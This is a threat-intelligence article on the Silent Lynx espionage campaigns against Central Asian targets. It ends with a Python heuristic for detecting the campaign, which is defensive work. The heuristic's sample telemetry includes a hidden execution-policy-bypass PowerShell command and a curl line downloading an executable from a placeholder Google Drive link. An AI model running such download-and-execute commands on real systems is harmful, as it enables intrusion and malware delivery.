A threat actor, dubbed ‘Silent Lynx’, has been linked to a series of sophisticated cyberattacks targeting key entities in Kyrgyzstan and Turkmenistan, including embassies, government-backed banks, lawyers, and think tanks.
According to a technical report from Seqrite Labs, the group is believed to originate from Kazakhstan, with a medium level of confidence, and has been linked to previous attacks against Eastern European and Central Asian governmental institutions.
The group’s attacks begin with spear-phishing campaigns targeting high-profile individuals in organizations. The malicious emails contain a RAR archive attachment, which delivers the final malicious payloads that grant the attackers remote access to the compromised systems. The payloads are designed to infiltrate sensitive networks and facilitate espionage.
Two major campaigns were detected by Seqrite Labs, the first of which took place on December 27, 2024. In this campaign, the attackers used a RAR archive containing an ISO file, which, once mounted and opened, triggered a malicious C++ binary and a decoy PDF file. The binary then deployed a PowerShell script that leveraged Telegram bots to execute commands and exfiltrate data. Some of the bot commands observed included curl commands used to download additional payloads from remote servers, including Google Drive.
The second campaign, while similar, featured a different payload composition. The RAR archive contained a decoy PDF and a Golang executable, which was designed to establish a reverse shell connection to an attacker-controlled server, giving the group further control over the infected systems.
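As an added example, not taken from the Seqrite report, the following Python heuristic flags the first campaign's chain in constructed process telemetry: a binary launched from the root of a mounted image, a PowerShell child process contacting api.telegram.org, and a PowerShell-spawned curl fetching from Google Drive. The event fields, file names and the drive-letter heuristic are assumptions for illustration.

```python
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent process image name
    image: str     # process image name
    cmdline: str   # full command line
    dest: str      # destination host of an outbound connection, "" if none


# Constructed sample telemetry (not real Silent Lynx data). The hostnames are the
# public services the report names as abused; file names are made up.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "winword.exe", '"winword.exe" C:\\Users\\a\\report.docx', ""),
    ProcEvent("explorer.exe", "notice.exe", "E:\\notice.exe", ""),
    ProcEvent("notice.exe", "powershell.exe", "powershell -w hidden -ep bypass -c ...", "api.telegram.org"),
    ProcEvent("powershell.exe", "curl.exe",
              'curl -o C:\\Users\\Public\\u.exe "https://drive.google.com/uc?id=PLACEHOLDER"', "drive.google.com"),
    ProcEvent("svchost.exe", "powershell.exe", "powershell -c Get-Date", ""),
]

# Executable started from the root of a non-C: drive letter: consistent with a user
# opening a binary inside a mounted ISO (heuristic assumption; expect tuning).
ROOT_OF_IMAGE = re.compile(r'^"?[D-Zd-z]:\\[^\\]+\.exe"?(\s|$)')


def event_findings(ev: ProcEvent) -> list[str]:
    """Per-event findings for the behaviours the report describes."""
    image, parent = ev.image.lower(), ev.parent.lower()
    findings = []
    if parent == "explorer.exe" and ROOT_OF_IMAGE.match(ev.cmdline):
        findings.append("exe_launched_from_image_root")
    if image == "powershell.exe" and ev.dest == "api.telegram.org":
        findings.append("powershell_to_telegram_bot_api")
    if image == "curl.exe" and parent == "powershell.exe" and "drive.google.com" in ev.cmdline:
        findings.append("powershell_spawned_curl_google_drive")
    return findings


def detect(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index to findings, adding a chain finding when a flagged
    image-root binary is the parent of the PowerShell process talking to Telegram."""
    results = {i: f for i, ev in enumerate(events) if (f := event_findings(ev))}
    iso_launched = {events[i].image.lower() for i, f in results.items() if "exe_launched_from_image_root" in f}
    for i, f in results.items():
        if "powershell_to_telegram_bot_api" in f and events[i].parent.lower() in iso_launched:
            f.append("chain_iso_binary_to_powershell_telegram")
    return results
```

Benign PowerShell use (the svchost-spawned Get-Date event) produces no finding, so the chain correlation, rather than PowerShell alone, is what carries the signal.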
Seqrite Labs also observed several tactical overlaps between Silent Lynx and YoroTrooper, a known cyber threat actor also associated with attacks targeting CIS (Commonwealth of Independent States) countries. YoroTrooper has previously used PowerShell and Golang tools in its campaigns, further suggesting potential connections or shared tactics between the two groups.